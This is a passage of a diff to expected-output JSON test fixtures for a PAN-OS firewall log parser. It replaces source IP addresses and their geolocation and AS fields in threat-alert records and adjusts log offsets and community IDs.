-        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -6595,9 +6290,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 27437,
+        "log.offset": 27336,
         "network.application": "web-browsing",
-        "network.community_id": "1:OSQCnxYE2CqKztyfnzJHya/llPw=",
+        "network.community_id": "1:vpvx2rrEII2Wtti+NqSoe98K6s4=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6629,7 +6324,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.6",
-            "65.55.5.231"
+            "81.2.69.143"
         ],
         "related.user": [
             "jordy"
@@ -6639,19 +6334,17 @@
         "server.port": 1064,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "65.55.5.231",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Redmond",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 47.6722,
-        "source.geo.location.lon": -122.1257,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.geo.region_iso_code": "US-WA",
-        "source.geo.region_name": "Washington",
-        "source.ip": "65.55.5.231",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -6664,17 +6357,7 @@
         "client.port": 1048,
         "client.user.name": "jordy",
         "destination.address": "65.54.71.11",
-        "destination.as.number": 8075,
-        "destination.as.organization.name": "Microsoft Corporation",
-        "destination.geo.city_name": "Los Angeles",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 34.0544,
-        "destination.geo.location.lon": -118.244,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "65.54.71.11",
         "destination.port": 80,
         "event.action": "data_match",
@@ -6699,7 +6382,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 27818,
+        "log.offset": 27717,
         "network.application": "web-browsing",
         "network.community_id": "1:MeB0cefg5kMN7f+LW+cirwH2nA8=",
         "network.direction": "inbound",
@@ -6755,7 +6438,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:18:37.000-02:00",
-        "client.ip": "74.125.239.17",
+        "client.ip": "89.160.20.156",
         "client.port": 80,
         "destination.address": "192.168.0.6",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6771,7 +6454,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,89.160.20.156,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -6783,9 +6466,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 28187,
+        "log.offset": 28086,
         "network.application": "web-browsing",
-        "network.community_id": "1:iDmf9CnG+CdUuHWmwVsmhee3/Qs=",
+        "network.community_id": "1:lI0hgoESF7/v82QAbsIMoPxInGQ=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6817,7 +6500,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.6",
-            "74.125.239.17"
+            "89.160.20.156"
         ],
         "related.user": [
             "jordy"
@@ -6827,16 +6510,19 @@
         "server.port": 1071,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "74.125.239.17",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "89.160.20.156",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
         "source.geo.name": "United States",
-        "source.ip": "74.125.239.17",
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -6849,13 +6535,6 @@
         "client.port": 57502,
         "client.user.name": "picard",
         "destination.address": "208.85.40.48",
-        "destination.as.number": 40428,
-        "destination.as.organization.name": "Pandora Media, Inc",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "208.85.40.48",
         "destination.port": 80,
@@ -6881,7 +6560,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 28556,
+        "log.offset": 28455,
         "network.application": "pandora",
         "network.community_id": "1:c67I85z1uJV7VW6M9MR5Q8fjHQM=",
         "network.direction": "inbound",
@@ -6937,7 +6616,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:58:18.000-02:00",
-        "client.ip": "74.125.224.198",
+        "client.ip": "81.2.69.193",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6953,7 +6632,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -6965,9 +6644,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 28944,
+        "log.offset": 28843,
         "network.application": "google-maps",
-        "network.community_id": "1:w5GKumufuJCv3Gw8bvP3vTxap24=",
+        "network.community_id": "1:tsjbpnOPfE5+wHs/9MImDTjVjp8=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -6999,7 +6678,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.198"
+            "81.2.69.193"
         ],
         "related.user": [
             "picard"
@@ -7009,16 +6688,17 @@
         "server.port": 57876,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.198",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.193",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.198",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7027,7 +6707,7 @@
     },
     {
         "@timestamp": "2012-04-09T08:22:27.000-02:00",
-        "client.ip": "188.190.124.75",
+        "client.ip": "1.128.3.4",
         "client.port": 80,
         "destination.address": "192.168.0.6",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7043,7 +6723,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,1.128.3.4,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -7056,9 +6736,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "low",
-        "log.offset": 29319,
+        "log.offset": 29215,
         "network.application": "web-browsing",
-        "network.community_id": "1:a7oyQr47OdJP8ZnG9SCELvH8aco=",
+        "network.community_id": "1:a/X3iTqQa+TxkHJgrAy4Npfe+ZM=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7089,7 +6769,7 @@
         "panw.panos.virtual_sys": "vsys1",
         "related.ip": [
             "0.0.0.0",
-            "188.190.124.75",
+            "1.128.3.4",
             "192.168.0.6"
         ],
         "related.user": [
@@ -7100,19 +6780,11 @@
         "server.port": 1082,
         "server.user.name": "jordy",
         "service.type": "panw",
-        "source.address": "188.190.124.75",
-        "source.as.number": 12357,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Oliva",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 38.9197,
-        "source.geo.location.lon": -0.1193,
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
         "source.geo.name": "Ukraine",
-        "source.geo.region_iso_code": "ES-V",
-        "source.geo.region_name": "Valencia",
-        "source.ip": "188.190.124.75",
+        "source.ip": "1.128.3.4",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7121,7 +6793,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:11:43.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7137,7 +6809,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7149,9 +6821,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 29699,
+        "log.offset": 29590,
         "network.application": "google-maps",
-        "network.community_id": "1:yyAK8WOE46l0/k8dVOECI6qa2zQ=",
+        "network.community_id": "1:Tc4KEUPBViPeku88f+PNN9tpeuc=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7183,7 +6855,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -7193,16 +6865,17 @@
         "server.port": 50986,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7211,7 +6884,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:14:02.000-02:00",
-        "client.ip": "74.125.239.3",
+        "client.ip": "216.160.83.61",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7227,7 +6900,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7239,9 +6912,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 30074,
+        "log.offset": 29962,
         "network.application": "google-maps",
-        "network.community_id": "1:15fj8zz0nlNi/Fnz8ibhS9Ihqdg=",
+        "network.community_id": "1:OjvHxM13sIYbWzkV4RtvyxXDyVM=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7273,7 +6946,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.239.3"
+            "216.160.83.61"
         ],
         "related.user": [
             "picard"
@@ -7283,16 +6956,18 @@
         "server.port": 51716,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.239.3",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
         "source.geo.name": "United States",
-        "source.ip": "74.125.239.3",
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7301,7 +6976,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:14:39.000-02:00",
-        "client.ip": "74.125.239.3",
+        "client.ip": "216.160.83.61",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7317,7 +6992,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7329,9 +7004,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 30447,
+        "log.offset": 30336,
         "network.application": "google-maps",
-        "network.community_id": "1:fl9AVyrQeXPX/eoeKOy+6/UoR8M=",
+        "network.community_id": "1:kYzGF0Llye+Lln7ejrGG5SI6mW8=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7363,7 +7038,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.239.3"
+            "216.160.83.61"
         ],
         "related.user": [
             "picard"
@@ -7373,16 +7048,18 @@
         "server.port": 52119,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.239.3",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
+        "source.address": "216.160.83.61",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
         "source.geo.name": "United States",
-        "source.ip": "74.125.239.3",
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.61",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7391,7 +7068,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:16:03.000-02:00",
-        "client.ip": "74.125.224.200",
+        "client.ip": "81.2.69.143",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7407,7 +7084,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7419,9 +7096,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 30820,
+        "log.offset": 30710,
         "network.application": "google-maps",
-        "network.community_id": "1:cHzYL+SCc86AntedL6fbRx+2wzE=",
+        "network.community_id": "1:AwfQlEV4j9qZjH7WG4q1qExon/o=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7453,7 +7130,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.200"
+            "81.2.69.143"
         ],
         "related.user": [
             "picard"
@@ -7463,16 +7140,17 @@
         "server.port": 52411,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.200",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.200",
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7485,13 +7163,6 @@
         "client.port": 52366,
         "client.user.name": "picard",
         "destination.address": "74.125.239.6",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "74.125.239.6",
         "destination.port": 80,
@@ -7517,7 +7188,7 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 31195,
+        "log.offset": 31082,
         "network.application": "google-analytics",
         "network.community_id": "1:pRuFj5DzdmtFceU+OTawbYPhbJg=",
         "network.direction": "inbound",
@@ -7573,7 +7244,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:25:04.000-02:00",
-        "client.ip": "74.125.224.193",
+        "client.ip": "216.160.83.57",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7589,7 +7260,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,216.160.83.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7601,9 +7272,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 31575,
+        "log.offset": 31462,
         "network.application": "google-maps",
-        "network.community_id": "1:e27i7C6aBac+TOOJNFkXsvos7v0=",
+        "network.community_id": "1:PFB0Gj5/utCZj8v3vJPCiBrGY3Y=",
         "network.direction": "outbound",
         "network.transport": "tcp",
         "observer.egress.interface.name": "ethernet1/1",
@@ -7635,7 +7306,7 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "74.125.224.193"
+            "216.160.83.57"
         ],
         "related.user": [
             "picard"
@@ -7645,16 +7316,18 @@
         "server.port": 53026,
         "server.user.name": "picard",
         "service.type": "panw",
-        "source.address": "74.125.224.193",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
+        "source.address": "216.160.83.57",
+        "source.as.number": 209,
+        "source.geo.city_name": "Milton",
         "source.geo.continent_name": "North America",
         "source.geo.country_iso_code": "US",
         "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
         "source.geo.name": "United States",
-        "source.ip": "74.125.224.193",
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.port": 80,
         "tags": [
             "forwarded",
@@ -7663,7 +7336,7 @@
     },
     {
         "@timestamp": "2012-04-09T07:36:04.000-02:00",
-        "client.ip": "74.125.239.20",
+        "client.ip": "1.128.3.4",
         "client.port": 80,
         "destination.address": "192.168.0.2",
         "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7679,7 +7352,7 @@
         "event.dataset": "panw.panos",
         "event.kind": "alert",
         "event.module": "panw",
-        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+        "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
         "event.outcome": "success",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -7692,9 +7365,9 @@
         "input.type": "log",
         "labels.captive_portal": true,
         "log.level": "informational",
-        "log.offset": 31950,
+        "log.offset": 31836,
